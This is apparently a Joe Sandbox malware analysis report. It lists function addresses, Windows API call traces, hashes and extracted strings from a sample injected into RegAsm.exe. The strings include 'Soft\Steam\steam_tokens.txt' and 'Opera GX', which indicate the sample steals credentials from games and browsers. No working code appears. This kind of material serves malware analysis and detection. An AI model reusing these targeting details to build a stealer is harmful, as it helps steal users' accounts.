Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: Opera GX
API String ID: 1719890681-3280151751
Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99

Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A

Strings

, xrefs: 00407B5D

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B

Function 00416FB7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

lstrlenA.KERNEL32(?), ref: 00416FFE

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

Soft\Steam\steam_tokens.txt, xrefs: 0041700E

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 502913869-3507145866
Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5

Function 00411E1F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

Strings

1iA, xrefs: 00411E47

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: 1iA
API String ID: 3494564517-1863120733
Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4

Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715

Function 0041CBB8 Relevance: 2.5, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041CBC9

Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1

malloc.MSVCRT ref: 0041CC06

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc$lstrcpylstrlen
String ID:
API String ID: 2974738957-0
Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8

Function 004184AE Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
Instruction ID: 897ff34fa84f0db00a67010516d6b662afcd179cf6ab32d5fb27a0f78a31b5bc
Opcode Fuzzy Hash: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
Instruction Fuzzy Hash: 34516031901201BBCE717BEE854AAF6B6D69FA0318B14048FF814AA232DF2D8DC45E5D

Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A

Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
Instruction ID: 1ebf8f7d6142e25c21b1da41a8396f416a06ca8f5008f9c8fada1f01269fc293
Opcode Fuzzy Hash: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
Instruction Fuzzy Hash: 30F03AB1E0015DABDB15DF78DC909EEB7FDEB48204F0045BAB909D3281EA349F458B94

Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8

Function 00412541 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 00412577

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
Instruction ID: ef242af97a818274634bdf18eaf41cd9f3ea813bb85b2b5ad444d7661f99d088
Opcode Fuzzy Hash: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
Instruction Fuzzy Hash: CAE09AB0D0420E9FDF44EFE4D5152DDBAF8BF08308F40916AC115F3240E37442058BA9

Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00407EB5

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

Non-executed Functions

Function 6C096C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C096CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C096D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C096D26

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C096D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C096D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C096D73
free.MOZGLUE(00000000), ref: 6C096D80
CertGetNameStringW.CRYPT32 ref: 6C096DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C096DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C096DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C096DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C096E10
CryptMsgClose.CRYPT32(00000000), ref: 6C096E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C096E34
CreateFileW.KERNEL32 ref: 6C096EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C096F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C096F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C09709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C097103
free.MOZGLUE(00000000), ref: 6C097153
CloseHandle.KERNEL32(?), ref: 6C097176
__Init_thread_footer.LIBCMT ref: 6C097209
__Init_thread_footer.LIBCMT ref: 6C09723A
__Init_thread_footer.LIBCMT ref: 6C09726B
__Init_thread_footer.LIBCMT ref: 6C09729C
__Init_thread_footer.LIBCMT ref: 6C0972DC
__Init_thread_footer.LIBCMT ref: 6C09730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C0973C2
VerSetConditionMask.NTDLL ref: 6C0973F3
VerSetConditionMask.NTDLL ref: 6C0973FF
VerSetConditionMask.NTDLL ref: 6C097406
VerSetConditionMask.NTDLL ref: 6C09740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C09741A
moz_xmalloc.MOZGLUE(?), ref: 6C09755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C097568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C097585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C097598
free.MOZGLUE(00000000), ref: 6C0975AC

Part of subcall function 6C0BAB89: EnterCriticalSection.KERNEL32(6C10E370,?,?,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284), ref: 6C0BAB94
Part of subcall function 6C0BAB89: LeaveCriticalSection.KERNEL32(6C10E370,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284,?,?,6C0A56F6), ref: 6C0BABD1

Strings

SHA256, xrefs: 6C096EC0
(, xrefs: 6C09768A
CryptCATAdminReleaseCatalogContext, xrefs: 6C0972C8
wintrust.dll, xrefs: 6C0972CD

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: b916a53fc8488b2b2f1ab6eed739f4564e2625661d34ec32d0460e37d94d407b
Instruction ID: 8cf16283f14c9be4fe0a3d3739d184f84c6934e588e56f95f00bcb2afcc5e178
Opcode Fuzzy Hash: b916a53fc8488b2b2f1ab6eed739f4564e2625661d34ec32d0460e37d94d407b
Instruction Fuzzy Hash: F052E0B2A002149FEB21CF28CC85BAA77F8FF45708F10519DE919A7640DB70AB94DF91

Function 6C0CF070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0CF09B

Part of subcall function 6C0A5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0A56EE,?,00000001), ref: 6C0A5B85
Part of subcall function 6C0A5B50: EnterCriticalSection.KERNEL32(6C10F688,?,?,?,6C0A56EE,?,00000001), ref: 6C0A5B90
Part of subcall function 6C0A5B50: LeaveCriticalSection.KERNEL32(6C10F688,?,?,?,6C0A56EE,?,00000001), ref: 6C0A5BD8
Part of subcall function 6C0A5B50: GetTickCount64.KERNEL32 ref: 6C0A5BE4

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C0CF0AC

